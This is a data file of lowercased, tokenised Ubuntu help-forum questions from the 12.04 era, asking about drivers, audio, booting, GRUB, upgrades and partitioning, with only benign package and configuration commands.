128921	how do i turn off the feature where a window grays out when it 's thinking ?	so in the last couple of releases of ubuntu ( forget when it started ) , a window will gray out if it is not responsive/thinking too hard . maybe `` gray out '' is n't the best term , it just sort of gets darker . i 'm not sure what the exact criterion is to set this off . for one program in particular ( mathematica 8.0 ) this gets annoying because the program grays out whenever i rotate a 3d plot for more than a couple of seconds . is there a way to turn this feature off , and even better , only for specific programs ? pictures of before i start rotating , and while i 'm rotating are below , in case my description is not clear . this only rarely happens with other programs , so i have no idea how to reproduce it if you do n't have mathematica .
128922	u1 12.04 sync files is extremely slow	i recently performed a clean install of 12.04 and was expecting to easily sync back my files from ubuntu one . my documents folder and u1 folder are all that needed to sync , ~318mb . i installed 2 days ago and am still waiting for all of the files to download . here 's a sample of my syncdaemon.log file : 2012-04-30 18:16:42,653 - ubuntuone.syncdaemon.hq - info - hashqueue : _hasher stopped 2012-04-30 18:16:42,654 - ubuntuone.syncdaemon.interactioninterfaces - info - shutdown : args ( , false ) , kwargs { } . 2012-04-30 18:16:42,654 - ubuntuone.syncdaemon.dbus - info - shutting down dbusinterface ! 2012-04-30 18:16:42,659 - ubuntuone.syncdaemon.interactioninterfaces - info - shutdown : result none . 2012-04-30 18:16:42,708 - ubuntuone.syncdaemon.tritcask - info - shutting down ... 2012-04-30 18:16:42,710 - ubuntuone.syncdaemon.storageclient - info - connection lost , reason : [ failure instance : traceback ( failure with no frames ) : : connection to the other side was lost in a non-clean fashion : connection lost . ] . 2012-04-30 18:16:42,728 - twisted - error - unhandled error in deferred : 2012-04-30 18:16:42,729 - twisted - error - unhandled error traceback ( most recent call last ) : failure : twisted.internet.error.connectionlost : connection to the other side was lost in a non-clean fashion : connection lost . 2012-04-30 18:16:42,729 - ubuntuone.syncdaemon.actionqueue - warning - connection lost : connection to the other side was lost in a non-clean fashion : connection lost . the sync system was working great on 11.10 before i moved over to 12.04 . i also run u1 on my work windows xp machine and that runs great ! thanks for your help , bart
128926	error : remove the disk and press any key to restart	i have problem with my usb memory ! so i am trying to make this usb memory bootable . using unebooting , i uploaded a linux and set the booting to read from usb . but the laptop keeps giving this error : remove the disk and press any key to restart . do i need to change some sector in usb ? what should i do , and how can i do it under a windows machine .
128929	dvds wo n't play under ubuntu 12.04	i 've installed the restricted extras package ( medibuntu ) but i still can not play a dvd under ubuntu 12.04 . i 've loaded vlc , but all i can get in it or in movie player is the audio but not the video for a dvd . i 've played dvds on this old box using xubunut 9.04 i think . i ca n't figure out what 's wrong . thanks , van dvd
128933	can not update nfs , the update manager shows packages but wo n't let me select them	i can not update nfs . ever since i upgraded from 10.04 lts the update manager shows two nfs packages but it wo n't let me click them . what should i do ? i tried : sudo apt-get -odebug : :pkgproblemresolver=1 dist-upgrade but it did n't help , eg : reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... starting starting 2 investigating ( 0 ) rpcbind [ amd64 ] < none - > 0.2.0-7ubuntu1 > ( net ) broken rpcbind : amd64 conflicts on portmap [ amd64 ] < 6.0.0-1ubuntu2.2 > ( net ) considering portmap : amd64 1 as a solution to rpcbind : amd64 1 holding back rpcbind : amd64 rather than change portmap : amd64 investigating ( 0 ) nfs-common [ amd64 ] < 1:1.2.0-4ubuntu4.2 - > 1:1.2.5-3ubuntu3 > ( net ) broken nfs-common : amd64 depends on rpcbind [ amd64 ] < none - > 0.2.0-7ubuntu1 > ( net ) ( > = 0.2.0-6ubuntu1 ) considering rpcbind : amd64 1 as a solution to nfs-common : amd64 1 holding back nfs-common : amd64 rather than change rpcbind : amd64 investigating ( 0 ) nfs-kernel-server [ amd64 ] < 1:1.2.0-4ubuntu4.2 - > 1:1.2.5-3ubuntu3 > ( net ) broken nfs-kernel-server : amd64 depends on nfs-common [ amd64 ] < 1:1.2.0-4ubuntu4.2 - > 1:1.2.5-3ubuntu3 > ( net ) ( = 1:1.2.5-3ubuntu3 ) considering nfs-common : amd64 1 as a solution to nfs-kernel-server : amd64 0 holding back nfs-kernel-server : amd64 rather than change nfs-common : amd64 try to re-instate ( 1 ) nfs-common : amd64 try to re-instate ( 1 ) nfs-kernel-server : amd64 done done the following packages have been kept back : nfs-common nfs-kernel-server 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . i found a bug report similar to my problem , but i do n't understand how i can `` bump the priority of rpcbind in the archive to 'standard ? '' what does this mean ? can anyone point me in the right direction ?
128939	upgrade to 12.04 - no audio pulse broken	trying to fix audio output . nvidia gt 520 is the card so hdmi audio . it was working perfectly in 11.10 . following the steps at : https : //help.ubuntu.com/community/so ... otingprocedure here is my alsa-info : http : //pastebin.com/yubn9t3z this command does generate sound ( good sign ! ) : aplay -d plughw:1,7 /usr/share/sounds/alsa/front_center.wav added the default pcm line to asound.conf , did not fix anything . if i configure vlc to play over alsa on hdmi 1,7 then it works . no users get sounds , xbmc no sound . i ca n't even use the system settings - > sounds - > hardware tab - > test speakers , none of the options can produce sound . this makes me believe pulse is toast . i am on hour 6 of trying to fix this . this is a htpc , running an upgrade from 11.10 to 12.04 . running kernel 3.2.0-24-generic . update using the pulse audio controls and an application like vlc at the same time i was able to visually see the app playing audio . the problem was it is defaulting to the built in audio and not the hdmi/dp one . so xbmc and vlc are now set to hdmi/dp output properly . problem still exists . nothing understands audio exists by default . they all assume the non existent built in audio is the one i want . even the gnome sound indicator does not appear , none of the star
128940	ubuntu will only boot off of a usb	i installed ubuntu 12.04 today from a usb and the install went fine ( i replaced windows xp with it ) . but when i tried to restart my computer nothing happened ; a couple of minutes later i tried booting it from the usb again and it launched the installed version of ubuntu . i can remove my usb after that point . is there anyway for it to boot from just the hard drive or will i keep on having to boot from my usb all the time ?
128944	how to write bash actions to a file ?	i know that there is a way to write bash shell outputs to a file . however , i want to know what commands have been executed by an application as some of these executions are not outputted as a shell output . so , is there a way to write commands , including outputs , that were executed to a file ?
128945	ubuntu 12.04 , music wo n't sync to ipod	i was looking for a solution to this online but could n't find one . i 've been using rhythmbox for my ipod for a long time now , however in ubuntu 12.04 , in rhythmbox , when i drag a music file from my library to my ipod , where it would usually sync/copy across , nothing happens . it is an ipod touch , i think it is the 3rd generation before/without the camera . if anyone has any solutions to this or ideas of what to try please let me know . thank you , paul
128950	can previous installation partition be made bootable	ok , ranting and raving wo n't get me anywhere . i installed 12.04 and all my previous stuff was there and worked . i was trying to tweak it and followed some bad advice and screwed it up . i then re-installed 11.10 and that installation created a new partition , i can still access all my stuff on the other partition but what i 'd really like to do is for ubuntu to boot into the partition where all my stuff is and for everything to work like it used to . is that possible ?
128952	wireless connection disconnects and reconnects with a netgear wna1000	ever since i made the permanent switch from vista to ubuntu i 've had wireless connectivity problems . from watching the network manager when it disconnects it seems like it turns off the receiver for some reason . could it be bad drivers ? i used their install software and the site does n't really offer driver downloads . the adapter is a netgear wna1000 if memory serves , and i do n't know much about the router except that it 's a motorola surfboard . and i figure this might help a bit *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 01 serial : 00:1b : b9 : a7:39 : a4 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:40 ioport : d800 ( size=256 ) memory : feaff000-feafffff memory : feac0000-feadffff *-network description : wireless interface physical id : 1 bus info : usb @ 2:1.1 logical name : wlan0 serial : 00:26 : f2:8b : fb:38 capabilities : ethernet physical wireless configuration : broadcast=yes driver=carl9170 driverversion=3.2.0-24-generic-pae firmware=1.9.4 ip=10.0.0.36 link=yes multicast=yes wireless=ieee 802.11bgn i have tried installing wicd and it did n't fix the problem . any help would be greatly appreciated . this problem is greatly limiting what i can do with my computer .
128956	i ca n't install ubuntu on windows 7	i 've made my 8 gb usb flash drive bootable with ubuntu and i tried to install it . it showed up but it does n't let me choose which partition . i have 2 partition , c : which i have windows 7 on with 58 gb of space and have e : with +900 gb . i want to setup ubuntu on c not e. how to choose that , because it keep saying `` resizing '' and so on , and do not use this partition and i still do n't understand how to pick c
128963	how do i report a bug if i have no internet or usb or mouse on my machine ?	the previous question i posted was closed since i was advised that it was a bug , not a help issue . that problem was that upgrading from ( working ) 11.10 to 12.04 ( unusable ) on my lenovo y560 has left me with no mouse . the mouse arrow stays frozen in the middle of the screen . no usb devices are recognized at all . there is no internet connection . so , the problem i am having here is that for the life of me i ca n't figure out how to report this as a bug , since i ca n't get any bug-report information out of my lenovo . i can run the suggested `` ubuntu-bug xorg '' , but then i 'm stuck because there 's no internet , and i ca n't even hand-copy the information in the `` send problem report to developers ? '' window because i ca n't use the mouse to open the drop-down entries , or scroll the window . meanwhile , i ca n't get any help on the problem either because the thread has been closed . is there a way to report this bug ? how ?
128966	how do i install ruby-rvm ?	i want to install a rails environment on ubuntu 11.04 . i tried : $ sudo apt-get install ruby-rvm but got the error : unable to locate package ruby-rvm my other pc has ubuntu 11.10 , and this works fine there : $ sudo apt-get install ruby-rvm $ rvm install ruby-1.9.3-p125 $ sudo gem update -- system $ sudo gem install rails
128973	what to do if you do n't have username	i 've managed to load ubuntu onto an xp system that 's died , but it asks for the username and password , i have my password but not the username ... is there any other way to logon and use ubuntu to recover data ?
128976	ubuntu 12.04 with 120gb ssd and 500gb spinner , partition help needed	i am ready to ditch my windows 7 install on my laptop , finally , after getting all of the linux application counterparts working how i want . right now i am running win7 on my 120gb ssd , and have ubuntu 12.04 running on my 500gb hybrid spinner . what would be the best way to set my system partitions up with ubuntu running on the ssd with the 500gb spinner as my storage/temp area ? i am thinking that the 120gb should be setup with the entire drive as / , a 12288mb partition setup on the spinner for swap ( 8gb ram ) , /tmp partition on the spinner for burning at about 50gb , then the remaining space on the spinner set to /home/username/store for my storage . additionally , i have read that you need to disable the journaling in ext4 and also add in a cron job to trim the ssd . any information on how to begin here would be helpful , thanks !
128987	ubuntu 12 breaks gcc 4.7 build from source	i use c++11 extensively , so right after installing the new xubuntu 12.04 lts release , i went to build gcc from source . after getting the required dependencies using sudo apt-get build-dep gcc-4.7-base , i checked out the 4.7.0 tag of gcc in subversion and started building it . on my 64-bit laptop , the build ( configured with -- disable-multilib -- enable-libstdcxx-time=rt -- enable-languages=c , c++ ) failed to find files related to libc6-dev despite that package being installed . i was only able to fix the issues by soft linking /usr/lib64 to /usr/lib/x86_64-linux-gnu at the suggestion of a stackoverflow post . after that , gcc built successfully and seems to work fine after install . my 32-bit desktop system was another story . i had the same initial problem where libc6-dev files could n't be found by the gcc build chain . in the end i had to export the following environment variables in order for it to build correctly ( the idea was taken from here ) : export library_path=/usr/lib/i386-linux-gnu/ export c_include_path=/usr/include/i386-linux-gnu export cplus_include_path=/usr/include/i386-linux-gnu hoping that had solved my issues , i went to try the newly installed gcc build out , at which point it instantly failed on the first project i tried it on ( building the latest version of vim from source ) . it failed to find the same files the gcc build failed to find , and issued the following message before failing in a flurry of errors : hmm , sed is very pessimistic about your system header files . but it did not dump core -- strange ! let 's continue carefully ... if this fails , you may want to remove offending lines from osdef.h or try with an empty osdef.h file , if your compiler can do without function declarations . when i took this sob story to the gcc irc channel , several people there expressed frustration at ubuntu and told me these errors were caused by ubuntu 12 changing long-standing paths to files . could anyone shed some light on this ?
128995	grub2 loopback booting ubuntu server iso	i 've got usb-keys setup to multi-boot different linux images using grub2 loopback . the standard ubuntu release isos boot fine , however when attempting to use the server iso it will fail to install saying 'unable to detect cd-media for installation ' . the grub.cfg entry ; menuentry `` ubuntu-12.04-server-amd64 '' { set isofile= '' /boot/ubuntu-12.04-server-amd64.iso '' loopback loop $ isofile linux ( loop ) /install/vmlinuz file= $ isofile/preseed/ubuntu-server.seed ro noprompt noeject -- initrd ( loop ) /install/initrd.gz } i 've attempted to add the following parameters as the fromiso works for debian images on the key iso-scan/filename=/boot/ubuntu-12.04-server-amd64.iso iso-scan/filename=/dev/disk/by-uuid/2859-44b7/boot/ubuntu-12.04-server-amd64.iso fromiso=/dev/disk/by-uuid/2859-44b7/boot/ubuntu-12.04-server-amd64.iso
128997	how to troubleshoot `` failed to load session '' errors ?	on the upgrade from 11.10 to 12.04 , my xmonad + unity configuration no longer works . when i attempt to log into this session , i get `` failed to load session 'xmonad ' '' . where can i look to figure out what 's going wrong ?
129001	chinese text rendering strangely after upgrade to 12.04	i just upgraded to 12.04 and it 's had a very strange effect on the way chinese text displays on my system . in both chrome and gedit , text that would have displayed normally in 11.10 seems to be rendered in a combination of two fonts : one `` normal '' font and one that seems lighter and italicized . it 's very annoying and difficult to read ; any idea what could have caused this ? i made no changes to my system besides upgrading to precise pangolin .
129003	install ubuntu 12.04 with ati hd radeon 6850	the problem is that i ca n't even run installation , seems that the monitor is n't connected to pc . i ca n't see anything , just black screen . i had almost the same problem with ubuntu 11.10 ( could n't solve it neither ) though that newest version had better compability .
129005	get unity style notifications in gnome classic ?	i prefer the look of unity 's notifications as opposed to gnome 's . how can i get it ? or at least some thing that looks similar ?
129007	how to install drivers for ati mobility radeon hd 4200 ?	i followed a guide to install drivers for my graphic card , however when i restart , ubuntu merely shows a blank screen . i can get a terminal through ctrl+alt+f1 , but that 's about it . where exactly am i going wrong , and what exactly can i do to fix my current situation ? i use a laptop with an external monitor and a ubuntu 12.04 64bit .
129008	ubuntu 12.04 chrome	i hate this bar in the chrome . i just upgrade from 10.04 lts i was wondering if there is a way to remove this . thanks .
129011	where is ubuntu server for intel system ?	i downloaded from http : //www.ubuntu.com/download/server . i did n't know it was not for intel system until i checked the file name this morning . the file name is ubuntu-12.04-server-amd64.iso , so it is for amd system . the web site does not say anything about system architecture , why does n't it ? where could i download one for intel system ?
129012	how can i restore the activity monitor ?	i was wondering if its still possible to get the activity monitor for things like load and ram usage like you used to be able to on 10.04 lts . i noticed that all them disappeared after the upgrade to 12.04 , now all i get is the file , edit menu buttons on that bar is there a way to add to this section of the menu bar ?
129013	an upgrade from 'precise ' to 'oneiric ' is not supported with this tool	i am trying to upgrade , but i get this message . an upgrade from 'precise ' to 'oneiric ' is not supported with this tool . what now ?
129014	upgraded to 12.04 lts now computer is unusable	i used the `` upgrade '' option to install 12.04 lts on a laptop from 11.10 . the installation completed and after rebooting i have these issues : login screen displays but all icons are missing mouse/trackpad does not work at all i can log in after logging in the desktop is black no icons appear in the left sidebar all icons are missing in the desktop pressing the `` windows '' key brings up the dash home search is working can search for 'terminal ' which brings up a terminal window terminal window is unresponsive and i ca n't type any commands there ctrl-alt-f2 causes a black screen to be shown an external mouse or keyboard , or an external monitor does not connect restarting with no external devices connected makes no difference the computer has a switchable intel graphics card . the other card is nvidia . what can i do to recover from this ? update : using a new copy of ubuntu 12.04 lts desktop from a bootable usb drive the laptop is running correctly with none of the above issues . thanks all for the tips .
129016	how to remove the reflection in docky ?	i do n't like the reflections on the dock when in 3d mode . if find it hard to see the indicators of what 's running . could someone give me steps on how to do it and how to undo it ( just incase i do n't like it ) . thanks
129022	determine destination location of apt-get install < package > ?	for some applications its fairly easy enough to locate where the application was installed to using the `` which '' command . however , some applications such as tomcat are a little out of my league to locate . i 'm asking for particular methodology that can be applied to any apt-get install to locate where the binary , library , and support files are installed to . the cause of this question is that i installed tomcat7 and i can 's seem to locate it and i have a list of customizations to perform .
129030	11.10 is not upgrading	my ubuntu 11.10 is not getting upgraded through update manager . it 's not able to connect to the servers also . while checking for updates it will try for sometime and pop-up message as check your internet connection . is there any way to manually upgrade . any ideas ?
129036	panel applets in ubuntu 12.04 lts	is possible ? espa単ol : necesito saber si se pueden instalar las antiguas `` applet panel '' , como clima , discos montados , cpu renderer , etc ; en ubuntu 12.04 lts
129038	video not playing after partial upgrade from 11.10 to 12.04 ?	! [ in the middle of my upgraded from 11.10 - 12.04 it was interupted with an electrical outage , when the power is back and as i resume my upgrade i was asked for `` partial install '' . and after the process is complete . all cleaned up . i got these error prompt . `` /usr/share/apport/apport-gpu-error-intel.py '' and `` the application unity 2d shell has closed unexpectedly '' and i ca n't play any videos from any player as well . it will just display a black screen and only the audio will play . help . ] [ 1 ]
129046	how do i switch between ubuntu and vista and how do i delete ubuntu ?	so i was wondering how do i switch between windows vista and ubuntu ? and also , if need to , how do i go about deleting ubuntu ?
129047	how do i install anything-sync-daemon ?	from the arch linux wiki : anything-sync-daemon ( asd ) is a tiny shell script designed to manage target directories in tmpfs and to periodically sync them back to your physical disc ( hdd/ssd ) . this is accomplished via a symlinking step and an innovative use of rsync to maintain back-up and synchronization between the two . one of the major design goals of asd is a completely transparent user experience . what would it take to use this in ubuntu ?
129048	how to partition external usb without losing data ?	i 'm running ubuntu 12.4 on a 8gb thumb drive . every time i restart i lose my settings because i do n't have enough room . so i want to install it on my 160gb external usb drive ( fat32 ) . my issue is , i have over 100gb stored on it and have no where to back it up . so i want to partition only 40gig for the system install without losing any of the data already on usb . is this possible ?
129051	realtek high definition audio codecs	i 've a lenovo y550 laptop with dual boot ubuntu 12.04 and windows & . i 've installed realtek high definition audio codecs in windows installation . when i hear audio in ubuntu it has less effect than windows . in ubuntu i am using the default installation settings . is there anything i can do to make it better ?
129055	sluggish hd movies on lenova y550 with geforce 240m	i have a lenova y550 laptop with dual boot 12.04 lts and windows 7 . my graphics card is nvidia geforce 240m . in windows hd movies ( 2 gb to 4 gb ) are playing so smooth and i did n't find any sluggishness till date , but in ubuntu it is different . video hangs and gets interrupted frequently and it is impossible to watch movies . i have installed nvidia accelerated graphics driver ( version current ) which is the recommended one from ubuntu . what should i do to make things same as that of windows ?
129056	desktop distorted after installing nvidia drivers	i just started using ubuntu for the first time about an hour ago so please bear with me . prior to installing the nvidia drivers the ubuntu start-up screen is completely distorted ( black screen with garbled graphical blocks ) . however , from the log-in screen onward its perfect . bright colors , crystal clear text , image fills the entire screen . display is properly detected as an hp tv in ubuntu display settings . now , after installing the nvidia drivers the ubuntu boot screen shows up normally . upon reaching the log-in screen we run into trouble . the image only fills about 85 % of the screen ( does n't reach the edges ) , colors are duller , and text is blurry with lines through it . problem persists after logging in . display is detected as laptop in ubuntu display settings . display is properly detected as an hp tv in the nvidia-settings but no setting changes seemed to fix the image . i tried both the recommended driver and the post-release driver , same problem . as soon as i uninstalled it goes back to garbled boot screen but perfect picture afterward . any ideas ? i can provide screen shots if that will help . system specs : asus p5p43td pro intel c2d e7500 nvidia 8800gt 512mb 4gb ddr3 1066 ubuntu 12.04 32-bit hp md5880n
129058	how to install windows 7 after ubuntu and dual boot ?	i just installed ubuntu , a full install removing the prior os . i was forced to remove windows 7 from my hp dv6 because of the max four partitions already being there . i did n't lose anything , all backed up . however , now i am looking to create another partition and install windows 7 on it . do i also need some sort of boot loader that lets me choose which to boot ?
129063	will btrfs automatically compress existing files when compression is enabled ?	i chose btrfs as the format of my / filesystem in the ubuntu 12.04 lts installer . after the installation completed , i added compress=lzo to the mount options in /etc/fstab and rebooted . will the existing files be automatically compressed now , or must i explicitly do something to force that to happen ?
129064	how to share files between windows7 ( guest ) and ubuntu 12.04 ( host ) ?	i searched on the internet but all issues have ubuntu as the guest . i have vmware workstation 8 wherein windows 7 is installed .
129075	i get two kernel updates , one for generic and one for generic-pae	i am using ubuntu 11.10 32 bit on notebook core 2 duo , 4gib ram . in order ubuntu to detect and use more than 3gib ram , i apt-get pae kernel . the problem comes when there were two update of kernel , linux-generic kernel and linux-generic-pae . should i update linux-generic-pae kernel only ? if the answer yes , how to stop update notification of linux-generic kernel ? i do n't want to update the wrong kernel accidentally .
129079	alt-tab does not display all applications	so far i 'm loving 12.04 . i have read about several alt-tab issues , but none that sound like the one i 'm encountering . when i have skype running , i ca n't alt-tab back to it . i can get back to it with the `` window spread '' navigation ( shift+alt+up ) , but that only works for non-minimized windows . if skype has been minimized , there is no way** to get back to it . is there a way to allow skype to show up in the alt-tab menu ? are there other applications that also do n't show up ? thanks ! ** actually , it is possible to get back to it by enabling the skype taskbar icon , but that does n't solve the alt-tab issue .
129081	why is live-build failing to find this package ?	i am trying to use live-build to create a remix of ubuntu 12.04 . my goal is a bootable liveusb that can install the base ubuntu system plus my custom packages . i am using live-build with the following config options : lb config -- mode ubuntu -- distribution precise -- hostname livecd -- username livecduser -- archive-areas `` main contrib '' -- binary-images iso-hybrid -- architecture amd64 -- debian-installer live for some reason it fails with the following error : building dependency tree ... done e : unable to locate package console-common p : begin unmounting filesystems ... strangely : apt-cache search console-common console-common - basic infrastructure for text console configuration anyone have thoughts or guidance on why this is failing ?
129083	where has prevu gone in 12.04 ?	prevu is probably my # 1 reason to use ubuntu over debian/testing . just upgraded my system to 12.04/x64 , and prevu is gone . what happened ? where did it go ? how do i get it back ? : (
129085	can you set a visualization as a desktop background ?	using unity , is there a way to set a music/sound visualiser as wallpaper ? i know that it can be done on android , and since at heart android has a modified linux kernel , i 'm wondering if it is possible . and if so , how ? also i am using 12.04 .
129086	battery indicator missing in gnome classic	i had upgraded to ubuntu 12.04 from ubuntu 11.10 and i am also using gnome classic . but the battery indicator is missing in the taskbar . so i followed the link ( http : //askubuntu.com/questions/78979/battery-indicator-missing ) found here.. i had used the same command mentioned here . but the battery icon was not visible.. i am using dell laptop with intel pentium . rgds , biju
129087	can i choose what language or software to install with the 12.04 dvd ?	i was wondering is it possible to choose what language or software to install with ubuntu 12.04 dvd , when we 're installing it ?
129089	dns server address no longer stored in resolv.conf ; where is it now ?	i sometimes switch dns servers , using the networkmanager indicator in the taskbar ; this worked fine with previous versions , and actually works fine with 12.04 , too , except for one thing : i use conky to display some system information , including the dns address , and i noticed that it is now always displaying 127.0.0.1 . i looked in resolv.conf , which is where it gets this address , and sure enough , that 's what it always says . i has a single line , with the admonishment not to edit the file by hand : nameserver 127.0.0.1 the only way i know to check the dns server address now is to open the network manager gui to check the info page . so , where is this information stored now ?
129096	hang when loading off usb , at command sysenter_do_call+0x12/0x28	i am trying to boot ubuntu 12.04 from the live usb . it runs properly until the kernel gives an error while booting : [ 32.072015 ] [ left arrow c15af11f right arrow ] sysenter_do_call+0x12/0x28 i also initially had a wireless issue that was fixed with a bios update . is there any way to fix the error shown above ? i an using an acer aspire 5002 with windows xp professional .
129097	how do i sync iphone 4 in rhythmbox ?	i am using ubuntu 12.04 and i have a iphone 4 with ios 5.1 that i just recently jailbroke . i was wondering if there was anyway that i can sync my music to my iphone ?
129102	do i need to install a desktop to run a nomachinenx server ?	i 've installed a ubuntu 12.04 cloud guest server . i do n't have a desktop . i can open a x window remotely . i 'd like to improve the speed by installing nomachinenx server . the community doc stays that i need to install a desktop . is that correct ? https : //help.ubuntu.com/community/nomachinenx i do n't want to open a remote desktop , just individual x windows . i do n't see why i would need a desktop . btw , the doc is for 3.5.0 . has anyone tried the 4.0 beta ? thanks in advance .
129108	open with mplayer not available for video files	i use mplayer to view my videos . however , in 12.04 , after installing mplayer , i do not see open with option in preference dialog . could you please tell me how to add mplayer to the list . i am pasting screenshot of my menus . please let me know if i am missing any thing . note : in second image , video option contains single movie player entry .
129111	how do i get a netgear n900 wnda4100 wireless usb adapter working ?	from what i can tell there is no linux support for the netgear n900 wnda4100 . ndiswrapper does n't support this , either . i tried installing the driver in wine and the installer crashes . how do i go about requesting support for this device ? is it not possible , or is it just that no one has requested support for this device yet ? i was trying to read stuff about compiling drivers myself but this is way way out of my league . unfortunately i have no other option besides using my android phone in usb tether mode while connected to my network via wifi . through some miracle , ubuntu sees it as a wired connection . but , this is not an ideal situation . http : //www.netgear.com/home/products/wireless-adapters/ultimate-wireless-adapters/wnda4100.aspx http : //www.wikidevi.com/wiki/netgear_wnda4100
129112	ca n't use netbook ( samsung nc10 ) touchpad after lubuntu update ( 12.04 )	after the recent update , the touchpad of my netbook samsung nc10 does n't seem supported anymore , as it does n't react . i tried to change some options ( touchpadoff=1 ) with synclient and gpointing-device-settings but this did n't cause any effects . do you have an idea , how i can reactivate the touchpad ?
129115	install xp along ubuntu 11.10	how to install xp along side of ubuntu 11.10 ? i 'm not sure of how to take backup of grub . i want to restore the menu after installing xp to restore my ubuntu . any ideas are appreciated .
129116	12.04 wo n't boot from live cd or usb	my laptop ( the only pc left in my home to install ubuntu 12.04 now that it 's out ) is not booting from live cd or usb . i get past the screen with the little person in the circle . but right after that , just black screen with the white cursor or indicator at top left . it just keeps blinking for hours . what should i do ? the cd is the same that i used for the other pcs ; they took it fine . i made the live usb in ubuntu 12.04 using the startup disk creator and the live cd with the windows 7 iso burning software that is preinstalled . here are my computer 's specs : core 2 duo , 4gb ram , 320gb hdd , nvidia gt 120m , 720p monitor , dvd-rom .
129117	system very slow after upgrading to 12.04 using unetbootin	i downloaded the 12.04 and used unetbootin . then when i tried to install , it asked whether to upgrade , so i upgraded ( from 10.04 ) . i think it did n't format my file system , as some of the apps are intact . but i doubt , if the installation has taken more space in addition to previous 10.04 . but now , after upgrade , loading apps have become very slow and also when i browse the youtube , the video and audio is n't smooth . i feel the upgrade has bloated my system . any solutions pls ?
129118	revert to colourful panel icons in 12.04	i do n't like the monochromatic panel icons and want to get back the colourful icons i had when using 11.10 ( blue with green tick for dropbox , blue network manager , yellow sun in weather indicator , etc ) . how can i do this ? is there a standard theme with colourful icons ?
129120	i lost unity desktop when i uninstalled nautilus . how to get it back ?	i did something silly i think . i wanted to use dolphin as default file manager . so i used package manager ( synaptic ) to remove nautilus file manager ( because ubuntu makes it so hard to change the default file manager globally ) . now when i rebooted and wanted to login , i no longer see the ubuntu unity desktop as an option to select from the menu at the login prompt . i only get into the gnome classical and gnome options . i went back to package manager and reinstalled nautilus file manager , and rebooted , but still , when i get to login in screen , i do not see the unity desktop ( no 2d option , nothing ) it only shows 2 options , gnome and gnome classic . i tried both , but they are not the same as the original desktop i had which is unity , with the launcher on the left , and the dash thing , and the 4 desktops , etc ... ( so confusing , so many desktops , and not even a way to find which desktop one is on at the time . like right-click with the mouse on the desktop , should tell one , `` you are using gnome ( classic ) '' or something . anyway , what do i need to do to get unity desktop ? do i need to reinstall 12.04 ? how ? i am already on 12.04 . i do not want to lose all the configurations i did .
129121	how to fix `` something wicked happened '' in software center ?	i have a fresh install of ubuntu 12.04 . whenever i try to download a new app from the ubuntu software center , it says : requires unauthenticated packages it then gives me an option to `` repair '' . when i click on `` repair '' , it starts `` updating cache '' with the progress bar stuck at zero . if i try download or install any package via terminal , it gets stuck at connecting to archive.ubuntu.com and i end up with the something wicked happened ... error message . i 've tried changing the server from 'software sources ' as mentioned in the troubleshooter . but that does n't help and the problem persists .
129128	how to add audio controls in the tray ?	after upgrading to 12.04 , i lost the audio controls from the system tray . how to add it back ? i am using gnome classic , without effects . i am not sure it the audio controls are missing in other desktops .
129129	graphics problems on asus eee 1101 ha , precise pangolin	i installed precise pangolin x386 desktop version via usb stick without incident . there are two , possibly related , problems : after suspend ( e.g . closing the lid ) , the graphics are corrupted as shown in this pic : http : //imgur.com/hoibq . the only solution seems to be a complete reboot . upon booting , the following happens : the screen goes black . after a while the little sound notification is heard . by switching to a text terminal ( ctrl+alt+f5 ) and then immediately back ( ctrl+alt+f7 ) i get the x session . however , the graphics are corrupted . only the top half of the screen is used , and both halves of the desktop are rendered on top of each other . the mouse movement wrap around the top and bottom of the screen . the only solution is to log in , then log out again . after doing this the graphics are normal until next suspend or power-off . i have tried disabling desktop effect , logging in with unity 2d , and uninstalling compiz , without success . i 've had this computer for years without successfully being able to run linux on it , please help ! update 1 : after implementing the first two options in this post , issue 2 is now resolved : https : //wiki.ubuntu.com/hardwaresupportcomponentsvideocardspoulsbo # black_screen_on_boot update 2 : issue 1 is now resolved : the suggested fix in the above link suffers from a minor formatting error : the command shoud be `` add_parameters= ' -- quirk-vbemode-restore ' '' , not `` add_parameters='âquirk-vbemode-restore ' '' .
129132	ubuntu 12.04 black screen after upgrade	i know the core of this problem have been asked before but i need help for my `` special case '' . i had ubuntu 11.10 installad with wubi on my windows 7 installation , after upgrading to 12.04 i cant start the system . the upgrade seemed to work fine , but the result did n't work after reboot . the startup stops with a list of services that seems to start or stop . now my problem , i have a live-cd of ubuntu but what to do now ? i guess i have to mount the old installation somehow and probably do something with it ( modify grub ? ) but i am not fluent enough with the commands to use . so if i asks nice . could someone please create a little guide of what steps i need to do and perhaps the commands to run ? at least i need to get into my old ubuntu to be able to save some stuff i forgot to take backup on . thanks in advance roland
129137	missing icons in gnome system settings	i have installed a ubuntu 12.04 amd64 server , and gnome shell on top of it . now i am missing some icons from the gnome system settings dialog . the missing icons is marked with red circles , on this image . mine only shows a small black box with a red stop sign . any ideas on how to fix this issue ?
129138	touchpad scrolling not working in nautilus of 12.04	my touchpad scrolling in ubuntu 12.04 in not working for the nautilus window manager . however it is perfectly working in the browsers when i have to scroll down the page . can i enable scrolling from somewhere or is this a bug ?
129142	upgrade to 12.04 failed to install grub	i started upgrade and everything went well until i got message that it failed to install ( or write i 'm not sure ) grub . now i ca n't boot windows or ubuntu , whatever option i choose , i get error no such partition ... . why this happens and how to fix it ? edit : fixed by reinstalling grub . now the problem is that grub loader menu is not visible , monitor reports unsupported resolution , and after 10 seconds boot default i guess .
